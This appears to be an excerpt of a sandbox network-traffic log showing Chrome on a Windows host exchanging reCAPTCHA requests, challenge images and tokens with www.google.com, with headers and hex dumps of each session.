                                                                                                                                                                                                                                                                  2024-10-29 19:10:34 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:34 GMT
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  83192.168.2.1649812142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:35 UTC858OUTGET /recaptcha/api2/payload?p=06AFcWeA4blY5MVPIuxvSqI2F8cJcTKI2jykD8dKcYCKNyJQdUqY-SQpdKOMdYDiVMy4PmaNToi6BkEpkYn5Zl4Gtipty5tV9tppOBZgn-Pgvikm2gLFlilOhjl2gYxwcbr39AqOMgA0M752LSRhzi28wHTsBKKrDYHyZwev37Obyl2ymyAWoy6C_LXFsPc9tyfe9W6qCDaYfwhprtiyWI7IdDeYk-gjLmVg&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=34d5e020329daa00 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:36 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:36 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:36 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:36 UTC697INData Raw: 31 37 64 33 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 17d3JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:36 UTC1378INData Raw: 7d 32 da cd 7f a7 5a 1b 68 d9 99 61 b8 66 79 d8 e7 0c e7 24 81 f7 7a f6 ce 0d 75 1a 2d a5 cd 8e 99 15 b5 e5 c3 cb 71 82 59 8c bb c2 bf 1c 03 9e 07 a8 cf 71 ef 58 28 b7 6f eb fa ee ff 00 e1 cb 93 ba 4d f5 fb d6 fa 5b d1 2f bf cc ba 8b 04 11 c7 0d b5 ba 5b 81 f2 5b 29 8c 95 4e 32 02 8f ff 00 56 46 3b 9a 21 75 6c 48 f0 c8 55 f0 81 23 62 03 29 c8 ef 90 7f 84 76 07 9e 33 c5 46 24 81 21 21 c0 68 9c b3 05 3c a9 0c 30 4f 42 39 c7 e3 d4 64 d4 af be 45 76 4f 31 c9 66 2c 08 e4 74 0c 09 eb d4 93 db a9 cf 53 5b a8 f3 69 dc c9 3b 35 6f eb fa fe bc 9d 64 1e e2 28 e2 65 55 18 1b 19 78 3b d8 0c 63 f9 81 92 3a 73 9c 1a 7d 9e 0a 07 49 59 ad 13 69 1b 4e 01 3c af 1c 0e 32 48 cf 3d 7f 1a 8a 46 8a 39 ae 27 b8 11 7d 9f ca cb be e2 43 00 72 c7 8c 92 36 f0 71 cf 6f 4a 68 be 1b 44
                                                                                                                                                                                                                                                                  Data Ascii: }2Zhafy$zu-qYqX(oM[/[[)N2VF;!ulHU#b)v3F$!!h<0OB9dEvO1f,tS[i;5od(eUx;c:s}IYiN<2H=F9'}Cr6qoJhD
                                                                                                                                                                                                                                                                  2024-10-29 19:10:36 UTC1378INData Raw: 8a d6 9c e3 52 49 db fa fe bf 21 42 4e 76 6f f2 df e7 f8 2f f2 b1 e6 3a 7f 85 7c 4d a8 5c b2 c7 a7 5e bb 02 43 07 5f 2f 83 8d c4 16 e4 0e 31 f8 1e dd 36 f4 df 00 6b 17 65 e1 bf 9e de da 4d b1 ca c6 48 cb 15 5c b6 00 23 01 be e9 ef dc 1c 9c d7 4f 75 e3 eb 89 2f f1 6d 65 0a f9 91 06 49 67 9d 9b 07 e7 f9 86 d5 18 fb c0 e0 f3 d7 b7 4c 39 3c 4f 7f 75 a9 4d 38 bc 86 d6 36 48 e3 00 6e 3b 94 6f fe 26 24 8c 6e ed f9 9c 8a d2 f2 6f b7 c9 7f 5f 87 4d 4c e3 1a 77 4d be ce f6 ed eb df f4 f9 9a e7 e1 bd bd b2 46 92 6b 17 a1 ca 0d c2 08 c2 2e 47 ca 78 27 39 ca f5 fa 51 58 be 3a d6 75 1b 0f 13 dd d9 45 ad 6a 16 eb 0e d1 b5 01 6c e5 41 24 90 a7 a9 3e be 94 54 28 c1 ea ed f3 47 5c 65 85 8a b4 e0 af f2 ff 00 33 b5 d3 fc 79 ae e8 c7 4c 95 64 4b a4 b1 05 62 88 31 78 f6 95 c7
                                                                                                                                                                                                                                                                  Data Ascii: RI!BNvo/:|M\^C_/16keMH\#Ou/meIgL9<OuM86Hn;o&$no_MLwMFk.Gx'9QX:uEjlA$>T(G\e3yLdKb1x
                                                                                                                                                                                                                                                                  2024-10-29 19:10:36 UTC1378INData Raw: f6 ce e6 39 96 3f 36 dd 48 51 12 93 b8 60 e4 0d bc 64 81 9c 7e 7c 0c e7 6b 1a 95 d2 4d f6 66 91 57 6a a6 48 0d 85 24 64 b6 0f 0a 73 c6 47 41 e9 df a4 f1 55 b4 df da df 64 16 30 ec b6 55 5f 38 3e f8 c1 e9 d7 1c 63 18 e7 07 8c fd 70 f5 8b fb 3d 37 56 92 de 7b 34 94 14 56 51 e5 aa 05 e0 0e 32 7a f4 1e bc 1f c7 8e 84 93 51 b4 6e f5 ec 76 54 83 5c ce 52 b7 e3 fd 7f 57 45 19 35 5b a7 d3 e7 bb 8a 55 82 64 f2 d0 6d 5c 39 50 0e 5b 23 19 ed ce 32 7f 5a e9 fc 25 a9 5f 0d 32 1b 8f 35 a5 1b c2 49 2f 0a 40 dd 8c 63 d8 11 ce 2b 2b 4e be b6 d4 ec 26 68 ad 2d e2 90 c3 b4 a2 20 2a 98 fb a7 6e 38 f7 6e 80 7a 02 4d 7a 0f c1 8b 07 d5 3e df a6 06 8a 06 82 10 e2 49 62 1e 59 c9 03 20 64 70 33 d7 38 3c f5 ad 23 f1 25 15 66 9f 96 c1 38 4a 54 f9 9c ae ad 6f c7 56 61 47 a8 18 ef 51
                                                                                                                                                                                                                                                                  Data Ascii: 9?6HQ`d~|kMfWjH$dsGAUd0U_8>cp=7V{4VQ2zQnvT\RWE5[Udm\9P[#2Z%_25I/@c++N&h- *n8nzMz>IbY dp38<#%f8JToVaGQ
                                                                                                                                                                                                                                                                  2024-10-29 19:10:36 UTC1276INData Raw: 91 db 8e 31 d3 02 8a 9a fb 55 b4 12 a8 9e 6b d5 6d 83 fd 49 69 54 e7 92 72 41 ef 9f f2 68 a3 d9 c6 5a ff 00 5f 91 9b fa c5 fd d5 1b 7f 5e 67 cd 1a f7 81 b5 b9 2f ae 25 d2 74 d7 8e c0 5c 62 d2 23 22 16 8c 11 9e 99 e7 ee 8c 1f 7a ca bb f0 5f 89 ec a3 4f 36 c1 a2 e7 78 65 95 0e ef 98 e4 64 36 3a 8c 72 79 e2 bd ca 2f 14 59 c9 33 3d ac 1a bd cb c7 92 eb 2e 18 42 01 cb 2b 11 cf 46 e0 8f 43 c5 3b 59 bd b5 bc 76 8c 3a dc 92 bf 2c 48 ed e6 48 72 43 92 b8 e4 03 8e fc 90 de d5 51 a9 64 b4 d3 fa d3 fa f5 db 51 b6 9f 47 ff 00 07 b5 be 7b 5d 7e 6c f0 ff 00 f8 43 35 e8 e7 89 64 b3 58 b7 95 23 ce 94 20 c1 20 e3 2c 72 4f 39 c6 78 1c f3 5d 87 c2 fd 23 59 b0 9c 5b 4a 2d 16 09 4a bc 8b f6 b4 0e b8 3b 5b e6 53 9c 80 3a 64 77 1e f5 d1 c5 6d a9 4b 12 fd 9f 44 96 ed 11 42 23 f9
                                                                                                                                                                                                                                                                  Data Ascii: 1UkmIiTrAhZ_^g/%t\b#"z_O6xed6:ry/Y3=.B+FC;Yv:,HHrCQdQG{]~lC5dX# ,rO9x]#Y[J-J;[S:dwmKDB#
                                                                                                                                                                                                                                                                  2024-10-29 19:10:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  84192.168.2.1649814142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:41 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 5858
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:41 UTC5858OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 35 48 76 6a 38 4b 79 52 4b 75 57 4a 6f 32 4f 7a 73 65 65 33 33 53 4a 6b 6b 68 47 58 43 6c 35 76 66 67 71 6e 78 42 32 4f 79 35 49 67 35 48 69 61 6a 61 6b 70 4d 64 37 65 57 76 55 6a 47 33 70 49 53 4c 32 32 30 42 73 74 33 36 6b 2d 57 52 2d 5f 4d 52 33 6c 41 52 2d 77 30 31 79 78 55 35 37 69 37 37 6b 77 43 69 50 56 62 44 5a 52 73 6b 6c 41 6b 61 64 72 61 51 53 69 4c 63 75 4c 50 53 56 72 6e 56 70 63 57 35 35 37 5a 7a 42 61 7a 6f 73 71 56 67 4b 51 62 5f 63 55 77 38 4f 37 7a 4f 63 35 66 53 38 42 35 31 4a 58 36 7a 33 64 32 79 34 39 67 37 6b 63 49 33 7a 6e 42 56 5a 6e 45 53 6c 68 6b 34 52 49 50 79 75 39 4d 54 4d 65 72 39 64 4e 6c 47 39 64 4d 50 71 55 4a 55
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA5Hvj8KyRKuWJo2Ozsee33SJkkhGXCl5vfgqnxB2Oy5Ig5HiajakpMd7eWvUjG3pISL220Bst36k-WR-_MR3lAR-w01yxU57i77kwCiPVbDZRsklAkadraQSiLcuLPSVrnVpcW557ZzBazosqVgKQb_cUw8O7zOc5fS8B51JX6z3d2y49g7kcI3znBVZnESlhk4RIPyu9MTMer9dNlG9dMPqUJU
                                                                                                                                                                                                                                                                  2024-10-29 19:10:41 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:41 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:41 UTC684INData Raw: 31 37 64 30 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 34 5a 70 72 35 4a 55 6c 7a 38 41 74 32 4b 78 35 6d 6d 77 43 51 6b 35 56 76 59 41 50 31 31 73 67 30 7a 6e 57 4e 75 66 47 4c 41 38 6e 69 4b 46 65 4b 33 31 37 6a 53 38 48 59 32 2d 38 6d 75 32 73 2d 55 30 47 6f 50 31 70 5a 41 59 4c 46 70 41 44 2d 6d 55 6c 58 64 55 75 2d 58 72 4e 4b 71 73 75 46 32 51 39 4f 30 4b 76 62 49 4b 75 52 32 50 31 43 68 68 44 75 63 5f 37 6c 62 50 75 66 4a 68 74 42 6f 59 63 50 37 52 34 72 43 47 55 37 36 5f 7a 66 65 4a 49 4a 73 6e 31 54 41 37 77 77 4e 71 7a 70 72 62 79 6e 74 6c 6a 45 65 4b 45 52 52 52 72 2d 79 6b 6f 69 66 7a 48 71 44 69 4c 43 74 53 57 78 5a 6b 55 6d 61 79 5f 32 33 68 4d 5a 43 6b 52 36 4e 63 53 49 62 4b 62 58 68 4b 57 6b 56 55 46 71 45
                                                                                                                                                                                                                                                                  Data Ascii: 17d0)]}'["dresp","03AFcWeA4Zpr5JUlz8At2Kx5mmwCQk5VvYAP11sg0znWNufGLA8niKFeK317jS8HY2-8mu2s-U0GoP1pZAYLFpAD-mUlXdUu-XrNKqsuF2Q9O0KvbIKuR2P1ChhDuc_7lbPufJhtBoYcP7R4rCGU76_zfeJIJsn1TA7wwNqzprbyntljEeKERRRr-ykoifzHqDiLCtSWxZkUmay_23hMZCkR6NcSIbKbXhKWkVUFqE
                                                                                                                                                                                                                                                                  2024-10-29 19:10:41 UTC1378INData Raw: 6a 39 62 71 48 61 36 36 38 69 6b 35 63 6c 46 6b 52 53 6e 39 78 2d 71 51 78 69 79 77 39 7a 62 64 45 6d 79 4d 4b 46 4b 6b 6f 54 52 75 42 46 55 4d 71 57 31 30 6f 56 6e 61 4d 66 46 30 52 78 42 56 61 76 75 48 61 34 30 75 35 64 39 63 56 63 70 6e 55 52 4d 71 45 77 67 54 58 71 4e 37 4e 46 70 38 55 62 34 6f 6b 48 30 31 54 48 2d 39 66 6e 45 46 54 73 6e 67 31 74 4e 42 49 46 71 5a 6c 36 62 62 6a 39 79 71 4f 63 38 55 38 65 42 33 51 45 66 64 43 30 6e 77 47 39 38 30 63 2d 56 61 4d 6d 58 4d 77 50 71 71 6f 6d 52 30 79 38 72 7a 5f 36 38 55 65 6c 62 5a 6b 31 64 47 4b 70 4e 34 6d 43 46 49 32 63 62 7a 4a 7a 6d 53 6f 45 73 4f 2d 53 4a 41 65 51 49 45 36 4b 73 39 43 47 72 47 6a 68 4d 59 6e 44 6f 62 67 4b 62 50 4e 5f 73 72 4d 6b 77 5a 68 54 36 49 73 54 43 31 71 39 78 76 4e 37 53
                                                                                                                                                                                                                                                                  Data Ascii: j9bqHa668ik5clFkRSn9x-qQxiyw9zbdEmyMKFKkoTRuBFUMqW10oVnaMfF0RxBVavuHa40u5d9cVcpnURMqEwgTXqN7NFp8Ub4okH01TH-9fnEFTsng1tNBIFqZl6bbj9yqOc8U8eB3QEfdC0nwG980c-VaMmXMwPqqomR0y8rz_68UelbZk1dGKpN4mCFI2cbzJzmSoEsO-SJAeQIE6Ks9CGrGjhMYnDobgKbPN_srMkwZhT6IsTC1q9xvN7S
                                                                                                                                                                                                                                                                  2024-10-29 19:10:41 UTC1378INData Raw: 6d 33 4d 47 31 42 58 54 58 6a 62 74 48 75 6a 36 70 5f 67 33 34 65 41 4b 48 72 79 49 52 33 79 46 55 64 49 4b 47 54 52 50 65 36 4c 56 49 63 53 4a 63 74 34 54 71 6c 6e 31 36 54 61 61 75 4b 78 36 67 4d 46 36 68 6a 43 52 53 47 65 70 69 74 77 70 51 5a 45 41 4c 76 79 35 30 38 73 66 56 57 41 59 37 65 65 79 4b 49 43 38 4b 76 6a 38 35 46 5a 6f 6d 4d 65 78 33 43 43 49 52 75 5a 78 78 61 31 34 34 69 67 51 65 55 61 41 31 35 63 46 71 4f 33 35 2d 32 4e 31 30 5f 66 43 7a 73 69 30 62 66 6d 4f 5f 48 62 4b 52 41 48 76 74 4f 71 61 78 37 73 36 45 38 30 79 6f 6f 32 48 6c 6f 4d 76 41 43 37 65 6f 6a 72 55 35 6f 41 2d 54 4b 77 66 50 48 6f 71 6f 64 64 64 4d 45 57 65 52 45 69 79 4f 56 79 6d 77 4d 66 68 71 4e 4c 51 37 77 6d 57 4f 6d 64 66 70 31 69 59 7a 62 56 4f 4e 37 5a 34 33 70 4c
                                                                                                                                                                                                                                                                  Data Ascii: m3MG1BXTXjbtHuj6p_g34eAKHryIR3yFUdIKGTRPe6LVIcSJct4Tqln16TaauKx6gMF6hjCRSGepitwpQZEALvy508sfVWAY7eeyKIC8Kvj85FZomMex3CCIRuZxxa144igQeUaA15cFqO35-2N10_fCzsi0bfmO_HbKRAHvtOqax7s6E80yoo2HloMvAC7eojrU5oA-TKwfPHoqodddMEWeREiyOVymwMfhqNLQ7wmWOmdfp1iYzbVON7Z43pL
                                                                                                                                                                                                                                                                  2024-10-29 19:10:41 UTC1378INData Raw: 56 46 7a 33 59 6a 53 6f 49 46 68 6b 6d 73 66 66 6d 77 47 6f 6b 63 31 7a 30 53 58 52 4e 33 2d 6c 46 30 64 4b 45 46 2d 69 52 4d 67 68 55 6b 39 4a 31 7a 4e 43 43 6c 44 42 5f 39 6d 76 67 4c 72 6f 66 6b 64 36 6a 39 42 75 46 78 72 69 58 79 71 5f 6f 67 6e 44 50 50 74 7a 6d 5a 4b 46 34 7a 73 43 53 31 51 56 7a 56 63 61 72 74 56 75 52 38 68 68 72 71 30 31 66 5a 4b 62 6f 49 36 71 6c 49 75 69 35 73 34 35 33 74 70 73 55 39 6e 61 4e 4d 4a 6e 77 48 4f 6a 4a 70 74 41 51 77 6a 66 77 69 64 6f 59 38 62 49 30 50 78 74 51 2d 59 78 6e 59 39 6c 35 4f 52 4d 36 39 78 7a 68 5a 4a 41 6d 38 36 47 73 79 77 51 46 65 66 4f 41 32 69 51 51 5a 76 63 71 64 72 59 67 54 71 4b 53 67 6a 41 52 6f 6a 4d 6b 74 78 73 47 2d 36 52 30 5f 4a 4d 31 55 7a 6e 42 79 4d 37 71 69 32 43 2d 70 63 2d 54 30 44
                                                                                                                                                                                                                                                                  Data Ascii: VFz3YjSoIFhkmsffmwGokc1z0SXRN3-lF0dKEF-iRMghUk9J1zNCClDB_9mvgLrofkd6j9BuFxriXyq_ognDPPtzmZKF4zsCS1QVzVcartVuR8hhrq01fZKboI6qlIui5s453tpsU9naNMJnwHOjJptAQwjfwidoY8bI0PxtQ-YxnY9l5ORM69xzhZJAm86GsywQFefOA2iQQZvcqdrYgTqKSgjARojMktxsG-6R0_JM1UznByM7qi2C-pc-T0D
